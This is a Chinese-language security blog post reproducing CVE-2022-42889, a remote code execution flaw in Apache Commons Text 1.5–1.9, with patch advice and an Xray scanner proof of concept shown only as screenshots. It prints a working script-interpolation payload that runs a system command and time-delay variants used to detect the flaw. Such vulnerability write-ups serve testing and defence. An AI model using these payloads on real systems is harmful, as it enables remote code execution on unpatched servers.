CVE-2022-42889复现+Xray POC

admin 2022年10月27日21:25:34评论425 views字数 830阅读2分46秒阅读模式

CVE-2022-42889复现+Xray POC


漏洞简述

2022年10月13日 GMT+8 20:09:48

Apache发布安全公告,修复了Apache Commons Text中的一个远程代码执行漏洞(CVE-2022-42889)

Apache Commons Text版本1.5到1.9中,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。

影响范围

1.5 <= Apache Commons Text 版本<= 1.9

加固建议

目前该漏洞已经修复,受影响用户可以升级到Apache Commons Text 1.10.0。 下载链接: https://commons.apache.org/proper/commons-text/download_text.cgi

参考链接

https://www.mail-archive.com/[email protected]/msg07643.html https://nvd.nist.gov/vuln/detail/CVE-2022-42889

漏洞复现

参考:https://github.com/search?q=cve-2022-42889

环境如下:CVE-2022-42889复现+Xray POC

测试项

命令执行测试

1.命令执行成功,但是没有回显。

${script:javascript:java.lang.Runtime.getRuntime().exec('whomai')}
CVE-2022-42889复现+Xray POC

2.Dns验证 poc可以通过dnslog进行漏洞验证,但是无法带出当前用户名。CVE-2022-42889复现+Xray POC

在容器中测试,可以带出用户名。

CVE-2022-42889复现+Xray POC

POC编写思路

使用延时函数进行漏洞验证。 测试延时3秒

java.lang.Thread.sleep(3000)
CVE-2022-42889复现+Xray POC

测试延时5秒

java.lang.Thread.sleep(5000)
CVE-2022-42889复现+Xray POC

测试成功!

编写Xray-POC

主动扫描:

CVE-2022-42889复现+Xray POC

被动扫描:

CVE-2022-42889复现+Xray POC

结果输入:

CVE-2022-42889复现+Xray POC

测试完毕。

5.躺平

结束

对了忘记说了,关注下公众号,谢谢。


原文始发于微信公众号(The Matrix):CVE-2022-42889复现+Xray POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月27日21:25:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-42889复现+Xray POChttp://cn-sec.com/archives/1375279.html

发表评论

匿名网友 填写信息